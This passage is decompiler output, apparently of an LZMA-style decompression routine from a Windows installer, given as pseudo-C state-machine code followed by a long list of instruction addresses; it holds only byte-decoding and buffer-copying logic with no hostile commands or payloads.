                                                            													__eflags = __eax;
                                                            													 *__esi = __ax;
                                                            												} else {
                                                            													 *(__ebp - 0x10) = __ecx;
                                                            													0x800 = 0x800 - __edi;
                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            													__ebx = __ebx + __ebx;
                                                            													 *__esi = __cx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													continue;
                                                            												} else {
                                                            													L53:
                                                            													goto L46;
                                                            												}
                                                            											}
                                                            											L54:
                                                            											_t173 = __ebp - 0x34;
                                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                            											__eflags =  *_t173;
                                                            											goto L55;
                                                            										case 0xf:
                                                            											L58:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												L161:
                                                            												 *(__ebp - 0x88) = 0xf;
                                                            												goto L170;
                                                            											}
                                                            											L59:
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t203 = __ebp - 0x70;
                                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t203;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											L60:
                                                            											__eflags = __ebx - 0x100;
                                                            											if(__ebx >= 0x100) {
                                                            												L55:
                                                            												__al =  *(__ebp - 0x44);
                                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                            												goto L56;
                                                            											}
                                                            											L61:
                                                            											__eax =  *(__ebp - 0x58);
                                                            											__edx = __ebx + __ebx;
                                                            											__ecx =  *(__ebp - 0x10);
                                                            											__esi = __edx + __eax;
                                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            											__ax =  *__esi;
                                                            											 *(__ebp - 0x54) = __esi;
                                                            											__edi = __ax & 0x0000ffff;
                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            												__cx = __ax;
                                                            												_t217 = __edx + 1; // 0x1
                                                            												__ebx = _t217;
                                                            												__cx = __ax >> 5;
                                                            												__eflags = __eax;
                                                            												 *__esi = __ax;
                                                            											} else {
                                                            												 *(__ebp - 0x10) = __ecx;
                                                            												0x800 = 0x800 - __edi;
                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            												__ebx = __ebx + __ebx;
                                                            												 *__esi = __cx;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            											 *(__ebp - 0x44) = __ebx;
                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                            												goto L60;
                                                            											} else {
                                                            												L65:
                                                            												goto L58;
                                                            											}
                                                            										case 0x10:
                                                            											L109:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												L165:
                                                            												 *(__ebp - 0x88) = 0x10;
                                                            												goto L170;
                                                            											}
                                                            											L110:
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t365 = __ebp - 0x70;
                                                            											 *_t365 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t365;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											goto L111;
                                                            										case 0x11:
                                                            											L69:
                                                            											__esi =  *(__ebp - 0x58);
                                                            											 *(__ebp - 0x84) = 0x12;
                                                            											goto L132;
                                                            										case 0x12:
                                                            											L128:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												L131:
                                                            												__eax =  *(__ebp - 0x58);
                                                            												 *(__ebp - 0x84) = 0x13;
                                                            												__esi =  *(__ebp - 0x58) + 2;
                                                            												L132:
                                                            												 *(_t644 - 0x54) = _t642;
                                                            												goto L133;
                                                            											}
                                                            											L129:
                                                            											__eax =  *(__ebp - 0x4c);
                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                            											__ecx =  *(__ebp - 0x58);
                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                            											__eflags = __eax;
                                                            											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                            											goto L130;
                                                            										case 0x13:
                                                            											L141:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												L143:
                                                            												_t469 = __ebp - 0x58;
                                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                            												__eflags =  *_t469;
                                                            												 *(__ebp - 0x30) = 0x10;
                                                            												 *(__ebp - 0x40) = 8;
                                                            												L144:
                                                            												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                            												L145:
                                                            												 *(_t644 - 0x50) = 1;
                                                            												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                            												goto L149;
                                                            											}
                                                            											L142:
                                                            											__eax =  *(__ebp - 0x4c);
                                                            											__ecx =  *(__ebp - 0x58);
                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                            											 *(__ebp - 0x30) = 8;
                                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                            											L130:
                                                            											 *(__ebp - 0x58) = __eax;
                                                            											 *(__ebp - 0x40) = 3;
                                                            											goto L144;
                                                            										case 0x14:
                                                            											L156:
                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                            											__eax =  *(__ebp - 0x80);
                                                            											while(1) {
                                                            												L140:
                                                            												 *(_t644 - 0x88) = _t537;
                                                            												goto L1;
                                                            											}
                                                            										case 0x15:
                                                            											L91:
                                                            											__eax = 0;
                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            											__al = __al & 0x000000fd;
                                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                            											goto L120;
                                                            										case 0x16:
                                                            											goto L0;
                                                            										case 0x17:
                                                            											while(1) {
                                                            												L145:
                                                            												 *(_t644 - 0x50) = 1;
                                                            												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                            												goto L149;
                                                            											}
                                                            										case 0x18:
                                                            											goto L146;
                                                            										case 0x19:
                                                            											L94:
                                                            											__eflags = __ebx - 4;
                                                            											if(__ebx < 4) {
                                                            												L98:
                                                            												 *(__ebp - 0x2c) = __ebx;
                                                            												L119:
                                                            												_t393 = __ebp - 0x2c;
                                                            												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                            												__eflags =  *_t393;
                                                            												L120:
                                                            												__eax =  *(__ebp - 0x2c);
                                                            												__eflags = __eax;
                                                            												if(__eax == 0) {
                                                            													L166:
                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                            													goto L170;
                                                            												}
                                                            												L121:
                                                            												__eflags = __eax -  *(__ebp - 0x60);
                                                            												if(__eax >  *(__ebp - 0x60)) {
                                                            													goto L171;
                                                            												}
                                                            												L122:
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                            												__eax =  *(__ebp - 0x30);
                                                            												_t400 = __ebp - 0x60;
                                                            												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                            												__eflags =  *_t400;
                                                            												goto L123;
                                                            											}
                                                            											L95:
                                                            											__ecx = __ebx;
                                                            											__eax = __ebx;
                                                            											__ecx = __ebx >> 1;
                                                            											__eax = __ebx & 0x00000001;
                                                            											__ecx = (__ebx >> 1) - 1;
                                                            											__al = __al | 0x00000002;
                                                            											__eax = (__ebx & 0x00000001) << __cl;
                                                            											__eflags = __ebx - 0xe;
                                                            											 *(__ebp - 0x2c) = __eax;
                                                            											if(__ebx >= 0xe) {
                                                            												L97:
                                                            												__ebx = 0;
                                                            												 *(__ebp - 0x48) = __ecx;
                                                            												L102:
                                                            												__eflags =  *(__ebp - 0x48);
                                                            												if( *(__ebp - 0x48) <= 0) {
                                                            													L107:
                                                            													__eax = __eax + __ebx;
                                                            													 *(__ebp - 0x40) = 4;
                                                            													 *(__ebp - 0x2c) = __eax;
                                                            													__eax =  *(__ebp - 4);
                                                            													__eax =  *(__ebp - 4) + 0x644;
                                                            													__eflags = __eax;
                                                            													L108:
                                                            													__ebx = 0;
                                                            													 *(__ebp - 0x58) = __eax;
                                                            													 *(__ebp - 0x50) = 1;
                                                            													 *(__ebp - 0x44) = 0;
                                                            													 *(__ebp - 0x48) = 0;
                                                            													L112:
                                                            													__eax =  *(__ebp - 0x40);
                                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                            														L118:
                                                            														_t391 = __ebp - 0x2c;
                                                            														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                            														__eflags =  *_t391;
                                                            														goto L119;
                                                            													}
                                                            													L113:
                                                            													__eax =  *(__ebp - 0x50);
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            													__eax =  *(__ebp - 0x58);
                                                            													__esi = __edi + __eax;
                                                            													 *(__ebp - 0x54) = __esi;
                                                            													__ax =  *__esi;
                                                            													__ecx = __ax & 0x0000ffff;
                                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                                            													if( *(__ebp - 0xc) >= __edx) {
                                                            														__ecx = 0;
                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                            														__ecx = 1;
                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                            														__ebx = 1;
                                                            														__ecx =  *(__ebp - 0x48);
                                                            														__ebx = 1 << __cl;
                                                            														__ecx = 1 << __cl;
                                                            														__ebx =  *(__ebp - 0x44);
                                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                                            														__cx = __ax;
                                                            														__cx = __ax >> 5;
                                                            														__eax = __eax - __ecx;
                                                            														__edi = __edi + 1;
                                                            														__eflags = __edi;
                                                            														 *(__ebp - 0x44) = __ebx;
                                                            														 *__esi = __ax;
                                                            														 *(__ebp - 0x50) = __edi;
                                                            													} else {
                                                            														 *(__ebp - 0x10) = __edx;
                                                            														0x800 = 0x800 - __ecx;
                                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            														 *__esi = __dx;
                                                            													}
                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                            														L111:
                                                            														_t368 = __ebp - 0x48;
                                                            														 *_t368 =  *(__ebp - 0x48) + 1;
                                                            														__eflags =  *_t368;
                                                            														goto L112;
                                                            													} else {
                                                            														L117:
                                                            														goto L109;
                                                            													}
                                                            												}
                                                            												L103:
                                                            												__ecx =  *(__ebp - 0xc);
                                                            												__ebx = __ebx + __ebx;
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                            													__ecx =  *(__ebp - 0x10);
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            													__ebx = __ebx | 0x00000001;
                                                            													__eflags = __ebx;
                                                            													 *(__ebp - 0x44) = __ebx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													L101:
                                                            													_t338 = __ebp - 0x48;
                                                            													 *_t338 =  *(__ebp - 0x48) - 1;
                                                            													__eflags =  *_t338;
                                                            													goto L102;
                                                            												} else {
                                                            													L106:
                                                            													goto L99;
                                                            												}
                                                            											}
                                                            											L96:
                                                            											__edx =  *(__ebp - 4);
                                                            											__eax = __eax - __ebx;
                                                            											 *(__ebp - 0x40) = __ecx;
                                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                            											goto L108;
                                                            										case 0x1a:
                                                            											L56:
                                                            											__eflags =  *(__ebp - 0x64);
                                                            											if( *(__ebp - 0x64) == 0) {
                                                            												L162:
                                                            												 *(__ebp - 0x88) = 0x1a;
                                                            												goto L170;
                                                            											}
                                                            											L57:
                                                            											__ecx =  *(__ebp - 0x68);
                                                            											__al =  *(__ebp - 0x5c);
                                                            											__edx =  *(__ebp - 8);
                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            											 *( *(__ebp - 0x68)) = __al;
                                                            											__ecx =  *(__ebp - 0x14);
                                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                                            											__eax = __ecx + 1;
                                                            											__edx = 0;
                                                            											_t192 = __eax %  *(__ebp - 0x74);
                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                            											__edx = _t192;
                                                            											goto L80;
                                                            										case 0x1b:
                                                            											L76:
                                                            											__eflags =  *(__ebp - 0x64);
                                                            											if( *(__ebp - 0x64) == 0) {
                                                            												L163:
                                                            												 *(__ebp - 0x88) = 0x1b;
                                                            												goto L170;
                                                            											}
                                                            											L77:
                                                            											__eax =  *(__ebp - 0x14);
                                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            											__eflags = __eax -  *(__ebp - 0x74);
                                                            											if(__eax >=  *(__ebp - 0x74)) {
                                                            												__eax = __eax +  *(__ebp - 0x74);
                                                            												__eflags = __eax;
                                                            											}
                                                            											__edx =  *(__ebp - 8);
                                                            											__cl =  *(__eax + __edx);
                                                            											__eax =  *(__ebp - 0x14);
                                                            											 *(__ebp - 0x5c) = __cl;
                                                            											 *(__eax + __edx) = __cl;
                                                            											__eax = __eax + 1;
                                                            											__edx = 0;
                                                            											_t275 = __eax %  *(__ebp - 0x74);
                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                            											__edx = _t275;
                                                            											__eax =  *(__ebp - 0x68);
                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            											_t284 = __ebp - 0x64;
                                                            											 *_t284 =  *(__ebp - 0x64) - 1;
                                                            											__eflags =  *_t284;
                                                            											 *( *(__ebp - 0x68)) = __cl;
                                                            											L80:
                                                            											 *(__ebp - 0x14) = __edx;
                                                            											goto L81;
                                                            										case 0x1c:
                                                            											while(1) {
                                                            												L123:
                                                            												__eflags =  *(__ebp - 0x64);
                                                            												if( *(__ebp - 0x64) == 0) {
                                                            													break;
                                                            												}
                                                            												L124:
                                                            												__eax =  *(__ebp - 0x14);
                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                            													__eflags = __eax;
                                                            												}
                                                            												__edx =  *(__ebp - 8);
                                                            												__cl =  *(__eax + __edx);
                                                            												__eax =  *(__ebp - 0x14);
                                                            												 *(__ebp - 0x5c) = __cl;
                                                            												 *(__eax + __edx) = __cl;
                                                            												__eax = __eax + 1;
                                                            												__edx = 0;
                                                            												_t414 = __eax %  *(__ebp - 0x74);
                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                            												__edx = _t414;
                                                            												__eax =  *(__ebp - 0x68);
                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                            												__eflags =  *(__ebp - 0x30);
                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                            												 *(__ebp - 0x14) = _t414;
                                                            												if( *(__ebp - 0x30) > 0) {
                                                            													continue;
                                                            												} else {
                                                            													L127:
                                                            													L81:
                                                            													 *(__ebp - 0x88) = 2;
                                                            													goto L1;
                                                            												}
                                                            											}
                                                            											L167:
                                                            											 *(__ebp - 0x88) = 0x1c;
                                                            											goto L170;
                                                            									}
                                                            								}
                                                            								L171:
                                                            								_t539 = _t538 | 0xffffffff;
                                                            								goto L172;
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}















                                                            0x004066ed
                                                            0x004066ed
                                                            0x004066ed
                                                            0x004066ed
                                                            0x004066f3
                                                            0x004066f7
                                                            0x004066fb
                                                            0x00406705
                                                            0x00406713
                                                            0x004069e9
                                                            0x004069e9
                                                            0x004069ec
                                                            0x004069f3
                                                            0x00406a20
                                                            0x00406a20
                                                            0x00406a24
                                                            0x00000000
                                                            0x00000000
                                                            0x00406a26
                                                            0x00406a2f
                                                            0x00406a35
                                                            0x00406a38
                                                            0x00406a3b
                                                            0x00406a3e
                                                            0x00406a41
                                                            0x00406a47
                                                            0x00406a60
                                                            0x00406a63
                                                            0x00406a6f
                                                            0x00406a70
                                                            0x00406a73
                                                            0x00406a49
                                                            0x00406a49
                                                            0x00406a58
                                                            0x00406a5b
                                                            0x00406a5b
                                                            0x00406a7d
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a1d
                                                            0x00406a20
                                                            0x00406a24
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406a7f
                                                            0x00406a7f
                                                            0x004069f8
                                                            0x004069fc
                                                            0x00406b34
                                                            0x00406b34
                                                            0x00406b3e
                                                            0x00406b46
                                                            0x00406b4d
                                                            0x00406b4f
                                                            0x00406b56
                                                            0x00406b5a
                                                            0x00406b5a
                                                            0x00406a02
                                                            0x00406a08
                                                            0x00406a0f
                                                            0x00406a17
                                                            0x00406a17
                                                            0x00406a1a
                                                            0x00000000
                                                            0x00406a1a
                                                            0x00406a84
                                                            0x00406a91
                                                            0x00406a94
                                                            0x004069a0
                                                            0x004069a0
                                                            0x004069a0
                                                            0x0040613c
                                                            0x0040613c
                                                            0x0040613c
                                                            0x00406145
                                                            0x00000000
                                                            0x00000000
                                                            0x0040614b
                                                            0x0040614b
                                                            0x00000000
                                                            0x00406152
                                                            0x00406156
                                                            0x00000000
                                                            0x00000000
                                                            0x0040615c
                                                            0x0040615f
                                                            0x00406162
                                                            0x00406165
                                                            0x00406169
                                                            0x00000000
                                                            0x00000000
                                                            0x0040616f
                                                            0x0040616f
                                                            0x00406172
                                                            0x00406174
                                                            0x00406175
                                                            0x00406178
                                                            0x0040617a
                                                            0x0040617b
                                                            0x0040617d
                                                            0x00406180
                                                            0x00406185
                                                            0x0040618a
                                                            0x00406193
                                                            0x004061a6
                                                            0x004061a9
                                                            0x004061b5
                                                            0x004061dd
                                                            0x004061df
                                                            0x004061ed
                                                            0x004061ed
                                                            0x004061f1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004061e1
                                                            0x004061e1
                                                            0x004061e4
                                                            0x004061e5
                                                            0x004061e5
                                                            0x00000000
                                                            0x004061e1
                                                            0x004061b7
                                                            0x004061bb
                                                            0x004061c0
                                                            0x004061c0
                                                            0x004061c9
                                                            0x004061d1
                                                            0x004061d4
                                                            0x00000000
                                                            0x004061da
                                                            0x004061da
                                                            0x00000000
                                                            0x004061da
                                                            0x00000000
                                                            0x004061f7
                                                            0x004061f7
                                                            0x004061fb
                                                            0x00406aa7
                                                            0x00406aa7
                                                            0x00000000
                                                            0x00406aa7
                                                            0x00406201
                                                            0x00406204
                                                            0x00406214
                                                            0x00406217
                                                            0x0040621a
                                                            0x0040621a
                                                            0x0040621a
                                                            0x0040621d
                                                            0x00406221
                                                            0x00000000
                                                            0x00000000
                                                            0x00406223
                                                            0x00406223
                                                            0x00406229
                                                            0x00406253
                                                            0x00406259
                                                            0x00406260
                                                            0x00000000
                                                            0x00406260
                                                            0x0040622b
                                                            0x0040622f
                                                            0x00406232
                                                            0x00406237
                                                            0x00406237
                                                            0x00406242
                                                            0x0040624a
                                                            0x0040624d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406292
                                                            0x00406298
                                                            0x0040629b
                                                            0x004062a8
                                                            0x004062b0
                                                            0x00000000
                                                            0x00000000
                                                            0x00406267
                                                            0x00406267
                                                            0x0040626b
                                                            0x00406ab6
                                                            0x00406ab6
                                                            0x00000000
                                                            0x00406ab6
                                                            0x00406271
                                                            0x00406277
                                                            0x00406282
                                                            0x00406282
                                                            0x00406282
                                                            0x00406285
                                                            0x00406288
                                                            0x0040628b
                                                            0x00406290
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406927
                                                            0x00406927
                                                            0x0040692d
                                                            0x00406933
                                                            0x00406939
                                                            0x00406953
                                                            0x00406956
                                                            0x0040695c
                                                            0x00406967
                                                            0x00406967
                                                            0x00406969
                                                            0x0040693b
                                                            0x0040693b
                                                            0x0040694a
                                                            0x0040694e
                                                            0x0040694e
                                                            0x00406973
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406975
                                                            0x00406979
                                                            0x00406b28
                                                            0x00406b28
                                                            0x00000000
                                                            0x00406b28
                                                            0x0040697f
                                                            0x00406985
                                                            0x0040698c
                                                            0x00406994
                                                            0x00406997
                                                            0x0040699a
                                                            0x0040699a
                                                            0x004069a0
                                                            0x004069a0
                                                            0x00000000
                                                            0x00000000
                                                            0x004062b8
                                                            0x004062b8
                                                            0x004062ba
                                                            0x004062bd
                                                            0x0040632e
                                                            0x0040632e
                                                            0x00406331
                                                            0x00406334
                                                            0x0040633b
                                                            0x00406345
                                                            0x00000000
                                                            0x00406345
                                                            0x004062bf
                                                            0x004062bf
                                                            0x004062c3
                                                            0x004062c6
                                                            0x004062c8
                                                            0x004062cb
                                                            0x004062ce
                                                            0x004062d0
                                                            0x004062d3
                                                            0x004062d5
                                                            0x004062da
                                                            0x004062dd
                                                            0x004062e0
                                                            0x004062e4
                                                            0x004062eb
                                                            0x004062ee
                                                            0x004062f5
                                                            0x004062f9
                                                            0x00406301
                                                            0x00406301
                                                            0x00406301
                                                            0x004062fb
                                                            0x004062fb
                                                            0x004062fb
                                                            0x004062f0
                                                            0x004062f0
                                                            0x004062f0
                                                            0x00406305
                                                            0x00406308
                                                            0x00406326
                                                            0x00406326
                                                            0x00406328
                                                            0x00000000
                                                            0x0040630a
                                                            0x0040630a
                                                            0x0040630a
                                                            0x0040630d
                                                            0x00406310
                                                            0x00406313
                                                            0x00406315
                                                            0x00406315
                                                            0x00406315
                                                            0x00406318
                                                            0x0040631b
                                                            0x0040631d
                                                            0x0040631e
                                                            0x00406321
                                                            0x00000000
                                                            0x00406321
                                                            0x00000000
                                                            0x00406557
                                                            0x00406557
                                                            0x0040655b
                                                            0x00406579
                                                            0x00406579
                                                            0x0040657c
                                                            0x00406583
                                                            0x00406586
                                                            0x00406589
                                                            0x0040658c
                                                            0x0040658f
                                                            0x00406592
                                                            0x00406594
                                                            0x0040659b
                                                            0x0040659c
                                                            0x0040659e
                                                            0x004065a1
                                                            0x004065a4
                                                            0x004065a7
                                                            0x004065a7
                                                            0x004065ac
                                                            0x00000000
                                                            0x004065ac
                                                            0x0040655d
                                                            0x0040655d
                                                            0x00406560
                                                            0x00406563
                                                            0x0040656d
                                                            0x00000000
                                                            0x00000000
                                                            0x004065c1
                                                            0x004065c1
                                                            0x004065c5
                                                            0x004065e8
                                                            0x004065eb
                                                            0x004065ee
                                                            0x004065f8
                                                            0x004065c7
                                                            0x004065c7
                                                            0x004065ca
                                                            0x004065cd
                                                            0x004065d0
                                                            0x004065dd
                                                            0x004065e0
                                                            0x004065e0
                                                            0x00000000
                                                            0x00000000
                                                            0x00406604
                                                            0x00406604
                                                            0x00406608
                                                            0x00000000
                                                            0x00000000
                                                            0x0040660e
                                                            0x0040660e
                                                            0x00406612
                                                            0x00000000
                                                            0x00000000
                                                            0x00406618
                                                            0x00406618
                                                            0x0040661a
                                                            0x0040661e
                                                            0x0040661e
                                                            0x00406621
                                                            0x00406625
                                                            0x00000000
                                                            0x00000000
                                                            0x00406675
                                                            0x00406675
                                                            0x00406679
                                                            0x00406680
                                                            0x00406680
                                                            0x00406683
                                                            0x00406686
                                                            0x00406690
                                                            0x00000000
                                                            0x00406690
                                                            0x0040667b
                                                            0x0040667b
                                                            0x00000000
                                                            0x00000000
                                                            0x0040669c
                                                            0x0040669c
                                                            0x004066a0
                                                            0x004066a7
                                                            0x004066aa
                                                            0x004066ad
                                                            0x004066a2
                                                            0x004066a2
                                                            0x004066a2
                                                            0x004066b0
                                                            0x004066b3
                                                            0x004066b6
                                                            0x004066b6
                                                            0x004066b9
                                                            0x004066bc
                                                            0x004066bf
                                                            0x004066bf
                                                            0x004066c2
                                                            0x004066c9
                                                            0x004066ce
                                                            0x00000000
                                                            0x00000000
                                                            0x0040675c
                                                            0x0040675c
                                                            0x00406760
                                                            0x00406afe
                                                            0x00406afe
                                                            0x00000000
                                                            0x00406afe
                                                            0x00406766
                                                            0x00406766
                                                            0x00406769
                                                            0x0040676c
                                                            0x00406770
                                                            0x00406773
                                                            0x00406779
                                                            0x0040677b
                                                            0x0040677b
                                                            0x0040677b
                                                            0x0040677e
                                                            0x00406781
                                                            0x00000000
                                                            0x00000000
                                                            0x00406351
                                                            0x00406351
                                                            0x00406355
                                                            0x00406ac2
                                                            0x00406ac2
                                                            0x00000000
                                                            0x00406ac2
                                                            0x0040635b
                                                            0x0040635b
                                                            0x0040635e
                                                            0x00406361
                                                            0x00406365
                                                            0x00406368
                                                            0x0040636e
                                                            0x00406370
                                                            0x00406370
                                                            0x00406370
                                                            0x00406373
                                                            0x00406376
                                                            0x00406376
                                                            0x00406379
                                                            0x0040637c
                                                            0x00000000
                                                            0x00000000
                                                            0x00406382
                                                            0x00406382
                                                            0x00406388
                                                            0x00000000
                                                            0x00000000
                                                            0x0040638e
                                                            0x0040638e
                                                            0x00406392
                                                            0x00406395
                                                            0x00406398
                                                            0x0040639b
                                                            0x0040639e
                                                            0x0040639f
                                                            0x004063a2
                                                            0x004063a4
                                                            0x004063aa
                                                            0x004063ad
                                                            0x004063b0
                                                            0x004063b3
                                                            0x004063b6
                                                            0x004063b9
                                                            0x004063bc
                                                            0x004063d8
                                                            0x004063db
                                                            0x004063de
                                                            0x004063e1
                                                            0x004063e8
                                                            0x004063ec
                                                            0x004063ee
                                                            0x004063f2
                                                            0x004063be
                                                            0x004063be
                                                            0x004063c2
                                                            0x004063ca
                                                            0x004063cf
                                                            0x004063d1
                                                            0x004063d3
                                                            0x004063d3
                                                            0x004063f5
                                                            0x004063fc
                                                            0x004063ff
                                                            0x00000000
                                                            0x00406405
                                                            0x00406405
                                                            0x00000000
                                                            0x00406405
                                                            0x00000000
                                                            0x0040640a
                                                            0x0040640a
                                                            0x0040640e
                                                            0x00406ace
                                                            0x00406ace
                                                            0x00000000
                                                            0x00406ace
                                                            0x00406414
                                                            0x00406414
                                                            0x00406417
                                                            0x0040641a
                                                            0x0040641e
                                                            0x00406421
                                                            0x00406427
                                                            0x00406429
                                                            0x00406429
                                                            0x00406429
                                                            0x0040642c
                                                            0x0040642f
                                                            0x0040642f
                                                            0x0040642f
                                                            0x00406435
                                                            0x00000000
                                                            0x00000000
                                                            0x00406437
                                                            0x00406437
                                                            0x0040643a
                                                            0x0040643d
                                                            0x00406440
                                                            0x00406443
                                                            0x00406446
                                                            0x00406449
                                                            0x0040644c
                                                            0x0040644f
                                                            0x00406452
                                                            0x00406455
                                                            0x0040646d
                                                            0x00406470
                                                            0x00406473
                                                            0x00406476
                                                            0x00406476
                                                            0x00406479
                                                            0x0040647d
                                                            0x0040647f
                                                            0x00406457
                                                            0x00406457
                                                            0x0040645f
                                                            0x00406464
                                                            0x00406466
                                                            0x00406468
                                                            0x00406468
                                                            0x00406482
                                                            0x00406489
                                                            0x0040648c
                                                            0x00000000
                                                            0x0040648e
                                                            0x0040648e
                                                            0x00000000
                                                            0x0040648e
                                                            0x0040648c
                                                            0x00406493
                                                            0x00406493
                                                            0x00406493
                                                            0x00406493
                                                            0x00000000
                                                            0x00000000
                                                            0x004064ce
                                                            0x004064ce
